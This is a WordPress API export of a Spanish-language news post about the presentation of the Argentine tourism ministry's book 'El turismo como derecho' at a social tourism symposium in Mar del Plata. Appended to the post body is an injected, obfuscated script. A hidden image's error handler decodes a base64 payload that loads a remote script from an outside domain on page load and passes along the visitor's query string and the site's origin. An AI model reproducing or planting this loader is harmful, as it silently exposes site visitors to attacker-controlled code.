{"id":7433,"date":"2023-10-09T19:17:34","date_gmt":"2023-10-09T22:17:34","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7433"},"modified":"2025-08-13T15:52:41","modified_gmt":"2025-08-13T18:52:41","slug":"presentacion-de-libro-el-turismo-como-derecho","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7433","title":{"rendered":"Presentaci\u00f3n de libro \u201cEl turismo como derecho\u201d"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Fue lanzado en el marco del Simposio Internacional de Turismo Social que se realiza en Mar del Plata. Registra la recuperaci\u00f3n de las Unidades Tur\u00edsticas Chapadmalal y Embalse.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/el_turismo_como_derecho._ministerio_de_turismo_y_deportes_de_la_nacion.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">libro \u201cEl turismo como derecho\u201d<\/a>, una publicaci\u00f3n del Ministerio de Turismo y Deportes de la Naci\u00f3n que da cuenta de la&nbsp;<strong>recuperaci\u00f3n de las emblem\u00e1ticas Unidades Tur\u00edsticas Chapadmalal y Embalse<\/strong>&nbsp;desarrollada en los \u00faltimos cuatro a\u00f1os, fue presentado hoy en el&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/capacitate-turismo\/1deg-simposio-internacional-de-turismo-social\" target=\"_blank\" rel=\"noreferrer noopener\">Primer Simposio Internacional de Turismo Social<\/a>, que se realiza en Mar del Plata.<\/p>\n\n\n\n<p><em>\u201cNo concebimos las pol\u00edticas p\u00fablicas sin un reconocimiento a la historia del turismo social, sus trabajadores y todas aquellas personas que fueron y son sus protagonistas en ejercicio de su derecho\u201d<\/em>, subray\u00f3 en ese marco la subsecretar\u00eda nacional de Calidad, Accesibilidad y Sustentabilidad del Ministerio,&nbsp;<strong>In\u00e9s Albergucci<\/strong>.<\/p>\n\n\n\n<p>La funcionaria tambi\u00e9n destac\u00f3 que la decisi\u00f3n de poner en valor las unidades tur\u00edsticas a partir de la gesti\u00f3n del ministro&nbsp;<strong>Mat\u00edas Lammens<\/strong>&nbsp;tuvo&nbsp;<em>\u201cun punto de partida muy complejo, porque hubo que revertir un plan de desfinanciamiento que dej\u00f3 apenas uno o dos hoteles en condiciones m\u00ednimas de ser utilizados\u201d<\/em>.<\/p>\n\n\n\n<p>El panel en el que se present\u00f3 el libro cont\u00f3 con la presencia del director nacional de Turismo Social del Ministerio,&nbsp;<strong>Mauro V\u00e1zquez<\/strong>; la subsecretaria de Turismo de la Provincia de Buenos Aires,&nbsp;<strong>Soledad Mart\u00ednez<\/strong>, y&nbsp;<strong>Horacio Taccone<\/strong>, concejal del partido de General Puyerred\u00f3n y presidente de su Comisi\u00f3n de Turismo.<\/p>\n\n\n\n<p>La publicaci\u00f3n presentada hoy incluye&nbsp;<strong>im\u00e1genes hist\u00f3ricas<\/strong>&nbsp;de la etapa fundacional de las unidades tur\u00edsticas, otras que registran las recientes tareas de recuperaci\u00f3n y una tercera serie que refleja el disfrute de quienes se alojan en&nbsp;<strong>Chapadmalal y Embalse<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/20231005_163305.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>El simposio -organizado por el Ministerio, la Universidad Nacional de Mar del Plata y la Organizaci\u00f3n Internacional de Turismo Social, ISTO- comenz\u00f3 ayer, con un acto de apertura en el aula magna de la Facultad de Ciencias Econ\u00f3micas y Sociales, del que particip\u00f3 la titular de la Unidad de Gabinete de Asesores del Ministerio,&nbsp;<strong>Geraldine Oniszczuk<\/strong>.<\/p>\n\n\n\n<p>La actividad proseguir\u00e1 hoy y ma\u00f1ana, con una agenda intensa que concluir\u00e1 con una exposici\u00f3n de la historiadora&nbsp;<strong>Elisa Pastoriza<\/strong>&nbsp;y una recorrida de los participantes del simposio por la unidad tur\u00edstica de Chapadmalal.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Fue lanzado en el marco del Simposio Internacional de Turismo Social que se realiza en Mar del Plata. Registra la recuperaci\u00f3n de las Unidades Tur\u00edsticas Chapadmalal y Embalse. El&nbsp;libro \u201cEl turismo como derecho\u201d, una publicaci\u00f3n del Ministerio de Turismo y Deportes de la Naci\u00f3n que da cuenta de la&nbsp;recuperaci\u00f3n de las emblem\u00e1ticas Unidades Tur\u00edsticas Chapadmalal [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7434,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,29],"tags":[],"class_list":["post-7433","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7433","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7433"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7433\/revisions"}],"predecessor-version":[{"id":10293,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7433\/revisions\/10293"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7434"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}